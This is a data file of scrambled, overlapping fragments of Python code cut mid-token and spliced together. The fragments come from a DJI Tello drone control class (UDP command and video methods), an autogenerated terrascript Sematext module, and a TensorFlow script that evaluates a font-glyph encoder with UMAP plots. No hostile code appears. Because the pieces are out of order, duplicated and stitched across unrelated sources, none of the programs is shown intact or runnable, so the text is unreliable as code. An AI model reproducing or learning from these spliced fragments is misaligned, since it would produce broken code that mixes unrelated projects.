state (bool): receive state from", "= socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon =", "if not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello') self.frame", "empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__() self.response =", "available') while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command')", "self.lock: self.frame = frame def empty(self): with self.lock: return self.frame", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('left", "RuntimeError('Tello rejected to open the video stream') def close_video_stream(self): \"\"\"", "f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool return:", "{} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self,", "x2, y2, z2, speed), with_return) def set_speed(self, speed, with_return=False): \"\"\"", "\"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param", "def pop(self): return self.response def empty(self): return False class Client(object):", "'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False):", "self.lock: self.response = data.decode('utf-8') def pop(self): with self.lock: response, self.response", "bool, multiple values? return: int or list(int) \"\"\" result =", "def empty(self): return False class Client(object): def __init__(self, local_port, buffer_size,", "def _update_thread(self): while True: ok, frame = self.video.read() if ok:", "\"\"\" return: int, [10, 400]; 6553: out of bounds \"\"\"", "return: int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return: int,", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('cw", "'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\"", "'ok' or 'error' \"\"\" return self.send_command('flip b', with_return) def goto(self,", "[int(x) for x in result.split(' ')] else: return int(result) def", "to whatever the Tello last returned. \"\"\" while True: try:", "with_return) def flip_forward(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "to wait for a response of command. state (bool): receive", "None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if", "self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?', split=True)", "class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to", "x: int, [20, 500] param y: int, [20, 500] param", "command to the Tello and waits for a response. If", "return self.send_command('up {}'.format(x), with_return) def move_down(self, x, with_return=False): \"\"\" param", "to enter command mode or open the video stream. \"\"\"", "mode or open the video stream. \"\"\" self.command_timeout = command_timeout", "as e: print(e) break def empty(self): return self.response.empty() def pop(self):", "a RuntimeError exception is raised. 
Args: command (str): Command to", "(0, 0, 0), (x1, y1, z1), (x2, y2, z2) with", "the Tello and waits for a response. If self.command_timeout is", "frame = self.video.read() if ok: with self.lock: self.frame = frame", "state(self): return self.state_client.pop() if self.state_client else None def read_frame(self): if", "[1, 3600] param with_return: bool return: 'ok' or 'error' \"\"\"", "def pop(self): with self.lock: frame, self.frame = self.frame, None return", "or 'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False):", "return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def", "self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok':", "z2: int, [-500, 500] param speed: int, [10-60] param with_return:", "8889) self.enter_command_mode() self.video_client = None if video: self.open_video_stream() self.video_client =", "\"\"\" param x: int, [20, 500] param with_return: bool return:", "def state(self): return self.state_client.pop() if self.state_client else None def read_frame(self):", "is received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if", "self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected", "return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def", "is raised. Args: command (str): Command to send. Returns: str:", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip b',", "If self.command_timeout is exceeded before a response is received, a", "\"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\" param", "Tello. Runs as a thread, sets self.response to whatever the", "speed, with_return=False): \"\"\"fly a curve defined by (0, 0, 0),", "left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100,", "param z1, z2: int, [-500, 500] param speed: int, [10-60]", "frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects", "bool return: 'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return)", "= buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread =", "z1, x2, y2, z2, speed, with_return=False): \"\"\"fly a curve defined", "y2: int, [-500, 500] param z1, z2: int, [-500, 500]", "1024, True, State()) if state else None self.tello_address = ('192.168.10.1',", "500] param y1, y2: int, [-500, 500] param z1, z2:", "Tello. Raises: RuntimeError: If no response is received within self.timeout", "mode') def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "int, [-500, 500] param speed: int, [10-60] param with_return: bool", "x1, y1, z1, x2, y2, z2, speed, with_return=False): \"\"\"fly a", "pop(self): with self.lock: frame, self.frame = self.frame, None return frame", "open the video stream. 
\"\"\" self.command_timeout = command_timeout self.response_client =", "return self.state_client.pop() if self.state_client else None def read_frame(self): if self.video_client", "self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client else None def", "with_return: return st = time.time() while self.response_client.empty(): if time.time() -", "Tello rejects the attempt to enter command mode or open", "__init__(self): super(State, self).__init__() self.response = {} self.lock = threading.RLock() def", "def land(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('land')", "self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def", "threading.RLock() def recv(self, data): with self.lock: self.response = data.decode('utf-8') def", "[-100, 100] param forward_backward_velocity: int, [-100, 100] param up_down_velocity: int,", "with self.lock: self.frame = frame def empty(self): with self.lock: return", "int, [-100, 100] param with_return: bool return: 'ok' or 'error'", "{} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False):", "rotate_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600] param", "receive state from Tello? video (bool): receive video from Tello?", "self.open_video_stream() self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a", "pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video =", "param z: int, [20, 500] param speed: int, [10-100] param", "read_frame(self): if self.video_client is None: raise RuntimeError('Video is not available')", "int, [-100, 100] param up_down_velocity: int, [-100, 100] param rotate_velocity:", "if ':' in item} def pop(self): return self.response def empty(self):", "video: self.open_video_stream() self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends", "{}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param x: int,", "__del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for", "or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False):", "yaw] return: list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\"", "with_return=False): \"\"\" param speed: int, [10-100] param with_return: bool return:", "= command_timeout self.response_client = Client(local_port, 1024, True, Command()) self.state_client =", "int, [-100, 100] param forward_backward_velocity: int, [-100, 100] param up_down_velocity:", "or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x,", "= response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('',", "= data.decode('utf-8') def pop(self): with self.lock: response, self.response = self.response,", "with self.lock: frame, self.frame = self.frame, None return frame class", "from the Tello. 
Runs as a thread, sets self.response to", "self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "{} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command,", "'error' \"\"\" return self.send_command('curve {} {} {} {} {} {}", "the video stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port,", "\"\"\" return self.send_command('flip b', with_return) def goto(self, x, y, z,", "y, z, speed, with_return=False): \"\"\" param x: int, [20, 500]", "speed, with_return=False): \"\"\" param x: int, [20, 500] param y:", "\"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\"", "import threading class Response(object): def __init__(self): pass def recv(self, data):", "'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def flip_left(self,", "\"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity),", "Returns: str: Response from Tello. Raises: RuntimeError: If no response", "\"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error'", "return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def", "a thread, sets self.response to whatever the Tello last returned.", "self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected", "state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client =", "take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff') def", "self.state_client.pop() if self.state_client else None def read_frame(self): if self.video_client is", "a curve defined by (0, 0, 0), (x1, y1, z1),", "response, self.response = self.response, None return response def empty(self): with", "{} {}'.format(x, y, z, speed), with_return) def goto_curve(self, x1, y1,", "pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise", "\"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x),", "self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False):", "with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100]", "Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response = response", "item} def pop(self): return self.response def empty(self): return False class", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('speed {}'.format(speed),", "self.command_timeout is exceeded before a response is received, a RuntimeError", "\"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000]", "self.response is None class State(Response): def __init__(self): super(State, self).__init__() self.response", "z2, speed, with_return=False): \"\"\"fly a curve defined by (0, 0,", "[0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll, yaw]", "raise RuntimeError('Failed to connect to Tello') self.frame = None 
self.lock", "\"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise", "self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def", "to connect to Tello') self.frame = None self.lock = threading.RLock()", "= self.send_command(command) if split: return [int(x) for x in result.split('", "to send. Returns: str: Response from Tello. Raises: RuntimeError: If", "speed: int, [10-60] param with_return: bool return: 'ok' or 'error'", "\"\"\" return self.send_command('curve {} {} {} {} {} {} {}'.format(x1,", "'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self,", "self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return) def", "stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error' \"\"\" return", "self.lock: frame, self.frame = self.frame, None return frame class Tello(object):", "roll, yaw] return: list(int), [[-89, 89], [-179, 179], [-179, 179]]", "response is received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address)", "{}'.format(x1, y1, z1, x2, y2, z2, speed), with_return) def set_speed(self,", "Tello in command mode. Args: local_port (int): port of local", "__init__(self, local_port, buffer_size, daemon, response): self.response = response self.buffer_size =", "(float): seconds to wait for a response of command. state", "\"\"\" return: int, [0, 100] \"\"\" return self.get('battery?') def get_flight_time(self):", "self.send_command('flip b', with_return) def goto(self, x, y, z, speed, with_return=False):", "left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100, 100] param", "[20, 500] param with_return: bool return: 'ok' or 'error' \"\"\"", "split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip", "response def empty(self): with self.lock: return self.response is None class", "speed: int, [10-100] param with_return: bool return: 'ok' or 'error'", "(str): Command to send. Returns: str: Response from Tello. 
Raises:", "param x1, x2: int, [-500, 500] param y1, y2: int,", "is None: raise RuntimeError('Video is not available') while self.video_client.empty(): pass", "local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command mode.", "= threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def", "return self.send_command('emergency') def move_up(self, x, with_return=False): \"\"\" param x: int,", "= threading.RLock() def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1])", "return int(result) def get_speed(self): \"\"\" return: int, [10, 100] \"\"\"", "\"\"\" param with_return: bool return: 'ok' or 'error' \"\"\" return", "class Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response =", "int or list(int) \"\"\" result = self.send_command(command) if split: return", "(x2, y2, z2) with speed param x1, x2: int, [-500,", "pass def empty(self): pass class Command(Response): def __init__(self): super(Command, self).__init__()", "500] param y: int, [20, 500] param z: int, [20,", "data): pass def pop(self): pass def empty(self): pass class Command(Response):", "self.response def empty(self): return False class Client(object): def __init__(self, local_port,", "goto(self, x, y, z, speed, with_return=False): \"\"\" param x: int,", "rejects the attempt to enter command mode or open the", "or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x,", "return: 'ok' or 'error' \"\"\" return self.send_command('flip f', with_return) def", "\"\"\" return: int, [0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self):", "def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return self.get('height?')", "exception is raised. Args: command (str): Command to send. Returns:", "100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int, [0,", "get(self, command, split=False): \"\"\" param command param split: bool, multiple", "return response def empty(self): with self.lock: return self.response is None", "'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self, x, with_return=False):", "param speed: int, [10-60] param with_return: bool return: 'ok' or" ]
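# ---------------------------------------------------------------------------
# A minimal usage sketch for the Tello class above -- illustrative only, and
# assuming a drone that is powered on and reachable over its default access
# point (192.168.10.1, as hard-coded in Tello.__init__). The port and the
# distances below are arbitrary example values.
if __name__ == '__main__':
    drone = Tello(local_port=9999, video=False)  # skip video for a quick check
    print('battery: {}%'.format(drone.get_battery()))  # query commands return ints
    if drone.take_off() == 'ok':  # control commands answer 'ok' or 'error'
        drone.move_up(50)  # default with_return=False: send without waiting
        drone.rotate_clockwise(90, with_return=True)  # block for the reply
        drone.land()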
[ "UTC) # # For imports without namespace, e.g. # #", "<filename>terrascript/resource/sematext.py # terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36", "namespace, e.g. # # >>> import terrascript.resource.sematext # # instead", "# This is only available for 'official' and 'partner' providers.", "tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports without namespace,", "e.g. # # >>> import terrascript.resource.sematext # # instead of", "This is only available for 'official' and 'partner' providers. from", "# # For imports without namespace, e.g. # # >>>", "is only available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext", "without namespace, e.g. # # >>> import terrascript.resource.sematext # #", "# terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC)", "# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # #", "imports without namespace, e.g. # # >>> import terrascript.resource.sematext #", "# instead of # # >>> import terrascript.resource.sematext.sematext # #", "terrascript.resource.sematext # # instead of # # >>> import terrascript.resource.sematext.sematext", "# # >>> import terrascript.resource.sematext # # instead of #", "terrascript/resource/sematext.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) #", "instead of # # >>> import terrascript.resource.sematext.sematext # # This", ">>> import terrascript.resource.sematext.sematext # # This is only available for", "(24-Sep-2021 15:26:36 UTC) # # For imports without namespace, e.g.", "# # This is only available for 'official' and 'partner'", "# >>> import terrascript.resource.sematext.sematext # # This is only available", "Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For", "# # instead of # # >>> import terrascript.resource.sematext.sematext #", "by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports without", "terrascript.resource.sematext.sematext # # This is only available for 'official' and", "# # >>> import terrascript.resource.sematext.sematext # # This is only", "available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext import *", "import terrascript.resource.sematext.sematext # # This is only available for 'official'", "# For imports without namespace, e.g. # # >>> import", "import terrascript.resource.sematext # # instead of # # >>> import", "For imports without namespace, e.g. # # >>> import terrascript.resource.sematext", ">>> import terrascript.resource.sematext # # instead of # # >>>", "# >>> import terrascript.resource.sematext # # instead of # #", "of # # >>> import terrascript.resource.sematext.sematext # # This is", "generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC) # # For imports", "15:26:36 UTC) # # For imports without namespace, e.g. #", "only available for 'official' and 'partner' providers. from terrascript.resource.sematext.sematext import" ]
[ "numpy as np import os, time, csv import tqdm import", "eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1) acc", "plt.close('all') return acc def eval(): encoder = SimpleEncodeDecoder() encoder.eval() if", "txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels = np.concatenate(labels) print('run", "correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if target == predid: txt.write('Correct!\\n') correct_count +=", "model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir,", "= inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 =", "pred_id2, 'target_id': target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self,", "self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 = inputs['idx2']", "exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch = 1000", "CJK JP'] import net class SimpleEncodeDecoder: def __init__(self): self.save_dir =", "= self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self,", "= self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder')", "1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc = correct_count", "'IPAPGothic', 'Noto Sans CJK JP'] import net class SimpleEncodeDecoder: def", "python3 import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0],", "1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data = {", "last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager( checkpoint, directory=checkpoint_dir, max_to_keep=2)", "= './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300", "= tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager = tf.train.CheckpointManager(", "= [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0 failed_count", "net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out =", "os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch = 300 self.steps_per_epoch =", "def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch + 1)", "net.FeatureBlock() self.encoder.summary() self.decoder = net.SimpleDecoderBlock() self.decoder.summary() inputs = { 'image':", "= { 'image': inputs['input'], } feature = self.encoder(input_data) outputs =", "ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv'))", "target_id, 'target_id1': target_id1, 'target_id2': target_id2, } def make_plot(self, test_ds, epoch):", "} feature = self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index']", "pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict: id %d", "is None: self.init_epoch = 
int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch", "else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] *", "net.FontData() print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch", "= tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or", "eval(): encoder = SimpleEncodeDecoder() encoder.eval() if __name__ == '__main__': eval()", "print(\"Plot: \", self.init_epoch + 1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch +", "UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50)) ax.scatter(X_reduced[:,", "return { 'feature': feature, 'pred_id1': pred_id1, 'pred_id2': pred_id2, 'target_id': target_id,", "= %d\\n'%failed_count) txt.write('accuracy = %f\\n'%acc) result = np.concatenate(result) labels =", "= self.decoder(feature) target_id = inputs['index'] target_id1 = inputs['idx1'] target_id2 =", "acc = correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct =", "test_ds, epoch): result = [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w')", "labels = np.concatenate(labels) print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax", "pass import numpy as np import os, time, csv import", "= 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5) self.optimizer = tf.keras.optimizers.Adam(lr)", "feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model = tf.keras.Model(inputs, outputs,", "class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/'", "inputs['idx1'] target_id2 = inputs['idx2'] pred_id1 = tf.nn.softmax(outputs['id1'], -1) pred_id2 =", "= self.encoder(input_data) outputs = self.decoder(feature) target_id = inputs['index'] target_id1 =", "= np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1 * 100", "= 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys)) as pbar: for", "tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir)", "pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i])", "target = pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id %d = %s (p=%f)\\n'%(predid,", "print('run UMAP') X_reduced = umap.UMAP(metric='cosine').fit_transform(result) fig, ax = plt.subplots(figsize=(50, 50))", "= { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs =", "labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count = 0", "= [] labels = [] with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt: correct_count", "#!/usr/bin/env python3 import tensorflow as tf physical_devices = tf.config.list_physical_devices('GPU') try:", "1) acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) 
@tf.function", "make_plot(self, test_ds, epoch): result = [] labels = [] with", "self.eval_substep(inputs) result += [pred['feature']] labels += [pred['target_id']] for i in", "failed_count += 1 pbar.update(1) acc = correct_count / (correct_count +", "acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1)) print('acc', acc) @tf.function def", "print('acc', acc) @tf.function def eval_substep(self, inputs): input_data = { 'image':", "correct_count += 1 else: txt.write('Failed!\\n') failed_count += 1 pbar.update(1) acc", "id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) else: txt.write('predict: id", "inputs in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels", "as plt import datetime import signal import net from matplotlib", "} def make_plot(self, test_ds, epoch): result = [] labels =", "in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d =", "as pbar: for inputs in test_ds: pred = self.eval_substep(inputs) result", "0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \", self.init_epoch", "'./result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True) checkpoint_dir = self.save_dir self.max_epoch", "net class SimpleEncodeDecoder: def __init__(self): self.save_dir = './result/step1/' self.result_dir =", "result += [pred['feature']] labels += [pred['target_id']] for i in range(pred['target_id1'].shape[0]):", "csv import tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot", "import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import datetime import", "else: self.init_epoch = 0 self.model.summary() def eval(self): self.data = net.FontData()", "Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto", "(correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) txt.write('Failed = %d\\n'%failed_count)", "inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature) target_id =", "tf.config.experimental.set_memory_growth(physical_devices[0], True) except: # Invalid device or cannot modify virtual", "Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP'] import", "once initialized. pass import numpy as np import os, time,", "0.5) self.optimizer = tf.keras.optimizers.Adam(lr) self.encoder = net.FeatureBlock() self.encoder.summary() self.decoder =", "'image': inputs['input'], } feature = self.encoder(input_data) outputs = self.decoder(feature) target_id", "self.decoder.summary() inputs = { 'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs)", "def eval_substep(self, inputs): input_data = { 'image': inputs['input'], } feature", "in test_ds: pred = self.eval_substep(inputs) result += [pred['feature']] labels +=", "virtual devices once initialized. 
pass import numpy as np import", "self.data.glyphs[target-1])) predid1 = np.argmax(pred['pred_id1'][i]) predid2 = np.argmax(pred['pred_id2'][i]) predid = predid1", "self.data.id_count + 1: txt.write('predict: id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] *", "ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1])) plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300) plt.close('all') return acc def eval():", "id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) if", "(p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1:", "name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last = tf.train.latest_checkpoint(checkpoint_dir) checkpoint.restore(last) self.manager", "= tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder') checkpoint = tf.train.Checkpoint(optimizer=self.optimizer, model=self.model) last =", "as txt: correct_count = 0 failed_count = 0 with tqdm.tqdm(total=len(self.data.test_keys))", "i in range(pred['target_id1'].shape[0]): txt.write('---\\n') target = pred['target_id'][i].numpy() txt.write('target: id %d", "txt.write('predict: id %d = %s (p=%f)\\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))", "def __init__(self): self.save_dir = './result/step1/' self.result_dir = './result/plot/' os.makedirs(self.result_dir, exist_ok=True)", "checkpoint, directory=checkpoint_dir, max_to_keep=2) if not last is None: self.init_epoch =", "(self.init_epoch + 1)) print('acc', acc) @tf.function def eval_substep(self, inputs): input_data", "as tf physical_devices = tf.config.list_physical_devices('GPU') try: tf.config.experimental.set_memory_growth(physical_devices[0], True) except: #", "= 1000 self.batch_size = 64 lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5)", "= pred['target_id'][i].numpy() txt.write('target: id %d = %s\\n'%(target, self.data.glyphs[target-1])) predid1 =", "id %d nothing (p=%f)\\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid >", "import net from matplotlib import rcParams rcParams['font.family'] = 'sans-serif' rcParams['font.sans-serif']", "'image': tf.keras.Input(shape=(128,128,3)), } feature_out = self.encoder(inputs) outputs = self.decoder(feature_out) self.model", "= int(os.path.basename(last).split('-')[1]) print('loaded %d epoch'%self.init_epoch) else: self.init_epoch = 0 self.model.summary()", "pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2])) elif predid > self.data.id_count + 1: txt.write('predict:", "pbar.update(1) acc = correct_count / (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct", "= 0 self.model.summary() def eval(self): self.data = net.FontData() print(\"Plot: \",", "import tqdm import umap import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as", "/ (correct_count + failed_count) txt.write('==============\\n') txt.write('Correct = %d\\n'%correct_count) 